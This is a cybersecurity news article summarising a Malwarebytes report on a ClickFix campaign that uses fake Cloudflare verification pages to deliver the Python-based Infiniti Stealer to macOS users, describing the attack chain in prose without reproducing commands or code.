In a recent cybersecurity development, macOS users are being targeted by a new campaign using Cloudflare-themed verification pages to deliver a Python-based information stealer, according to a report by Malwarebytes.
How the Attack Unfolds
The attack initiates with a counterfeit CAPTCHA page that mimics a legitimate Cloudflare human verification process. This page prompts users to paste and execute a command in the Terminal, creating an illusion of authenticity.
Known as ClickFix, this technique predominantly leverages social engineering to deceive users into executing harmful commands. Initially used against Windows systems, this method has been adapted for macOS since August 2024, with increasing sophistication.
Execution and Payload
The fraudulent verification page provides explicit instructions for macOS users to engage with the Terminal, leading to the execution of a malicious command. This command fetches a Bash script from a remote server, which in turn decodes a payload, places a binary in a temporary directory, and executes it.
The script passes necessary command-and-control server details and authentication tokens, then self-deletes and terminates the Terminal session. The binary is a loader built using Nuitka, complicating static analysis by converting Python code into a native format.
The Impact of Infiniti Stealer
Upon execution, the loader activates the final payload, identified as the Infiniti Stealer malware. This Python-based stealer targets sensitive data such as browser credentials, Keychain information, cryptocurrency wallets, developer file secrets, and captures screenshots.
Information gathered is transmitted to a command-and-control server via HTTP POST requests. Subsequently, a notification is dispatched to a Telegram channel, and the captured credentials are queued for further cracking.
Infiniti Stealer employs strategies like randomized execution delays and checks for analysis environments to avoid detection. Malwarebytes highlights the adaptation of Windows-targeted techniques like ClickFix for macOS users, alongside new methods such as compiling Python into native applications, which complicates detection and analysis. This trend could signal more such attacks in the future.
Related readings include reports on BoryptGrab Stealer distribution, the emergence of the ‘SolyxImmortal’ information stealer, and North Korean hackers targeting macOS developers.
